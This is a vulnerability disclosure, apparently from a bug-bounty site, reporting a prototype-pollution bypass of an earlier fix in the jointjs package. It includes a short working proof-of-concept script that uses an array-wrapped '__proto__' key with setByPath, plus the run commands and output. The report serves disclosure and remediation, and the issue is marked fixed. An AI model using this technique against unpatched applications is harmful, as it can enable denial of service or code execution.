Prototype Pollution in clientio/joint

Valid

Reported on

Sep 5th 2021

✍️ Description

jointjs package is vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the path components used in the path parameter are arrays. In particular, the condition key === "__proto__" returns false if key is ["__proto__"]. This is because the === operator returns always false when the type of the operands is different.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
const jointjs = require("jointjs");
const obj = {};
console.log("Before : " + {}.polluted);
jointjs.util.setByPath(obj, [["__proto__"],'polluted'], 'Yes! Its Polluted',',');
console.log("After : " + {}.polluted);

Execute the following commands in the terminal:

npm i jointjs # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

Occurrences

util.mjs L146

We have contacted a member of the clientio/joint team and are waiting to hear back 2 years ago

A clientio/joint maintainer marked this as fixed with commit e5bf89 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the clientio/joint team and are waiting to hear back 2 years ago

A clientio/joint maintainer marked this as fixed with commit e5bf89 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation